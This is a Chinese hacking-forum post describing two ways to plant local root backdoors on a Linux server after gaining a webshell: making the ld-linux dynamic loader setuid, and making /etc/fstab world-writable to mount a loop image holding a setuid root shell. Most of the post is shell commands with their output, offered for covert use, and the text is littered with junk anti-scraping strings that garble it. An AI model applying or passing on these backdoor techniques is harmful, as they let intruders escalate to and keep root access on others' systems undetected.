中国网络渗透测试联盟

标题: webshell下LINUX提权+留后门 [打印本页]

作者: admin    时间: 2013-3-8 21:56
标题: webshell下LINUX提权+留后门
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究
, q% w$ g4 ^  j# T2 r
+ H/ x! q8 f& g) I5 J9 t[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究+ |' m/ y( e3 o4 ^7 ^3 [/ ]
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究, T6 z6 Y9 X  y4 v% u
lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究3 f3 g: }' L3 ^7 _4 P# T  _
[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究
6 j& l& Y; `$ o  [% ~+ p) h1 B5 B[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究2 u2 y3 O2 P$ o5 _1 |- a; B/ E: A3 Z
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
5 s, P% l# m1 m& }lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究9 o+ U: b. Q: G/ H$ u- J5 `9 ~( J
[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究
/ I& k* w" _. _% v( \$ \我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究5 P1 e- G+ u3 @

, P5 c# F. h% G* y. L( K+ P, ~3 Z' h& Z普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究6 a0 T) l6 G2 I; T' w, V

7 ]$ D% e2 W+ C3 O2 h[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究" P9 u. V1 n! Q, k
xiaoyu2ezX-BUG-关注前沿信息安全技术研究) T, }% b( e' R, j5 a! R
[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究& H! @0 p$ V7 ]8 r# _
root2ezX-BUG-关注前沿信息安全技术研究9 T0 ^0 n6 Z$ L7 W4 e: {* v. K; Z
[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究
0 O' |# r) W8 ]0 o" B* e恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究4 _. I( z& ?% L( M* ?! h

8 j# l- h. M' H& v( q8 J方法二:2ezX-BUG-关注前沿信息安全技术研究
' E. G7 z" l6 H0 L% u4 a. M1 D4 b6 Z
看过程:2ezX-BUG-关注前沿信息安全技术研究
4 z; R7 N; O8 {/ |4 {: a/ _0 y  i1 h- J, f1 F- }- [
[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
- D# I; y- g0 k1 l; j$ `2 H% @% t& P[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究, }& U, @# D/ T+ D/ t

- \& U* W6 Q5 e5 h" x6 I& U这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究
, D5 o/ `. c1 E) h3 \0 ^/ N4 }$ ]- V% g& K
[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
7 f+ j. R$ w  J5 r- e-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
( x' x6 S& q5 {; w) E[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究$ z; i% J6 t; Y# Z( r

) k5 ?8 D& U  T+ \6 @) O  r然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究
1 ]$ b* K; A4 p4 \7 U
$ I: b* @1 X0 D% a9 }[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究6 A- v8 i* V; l  G' K% }+ Q  j! _3 f
-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究; |7 A0 @  l: M6 O9 P; B
[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究! B5 C' U$ E+ Z$ T$ ]& w, i
[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究2 P2 l( e0 q) w' c: P
[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究
9 e' k' w9 v! {total 182ezX-BUG-关注前沿信息安全技术研究& ^! D' r8 T/ B+ r! N7 i8 j
drwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究
  ]1 ~) n: B  j) x/ L5 c-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究! M# K- i3 u3 k3 B# o. F  r
[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究- b- \7 q, z2 w  z# M! Q, [' a$ b' C
sh-3.2#2ezX-BUG-关注前沿信息安全技术研究* ^. p2 z  b8 w% G* e! X
看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究$ ~7 i0 ?+ x# Y
test这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究% P/ }! Q; t. [
* i( S8 E3 s1 t1 a% Q5 X
貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究1 X% A8 m* ~4 k, v
2ezX-BUG-关注前沿信息安全技术研究
% W5 L- b. Y, |% y" N
3 \# i# V' ^  O5 H. ^2 U) G
作者: wuyu    时间: 2013-3-13 15:10
谢谢分享




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2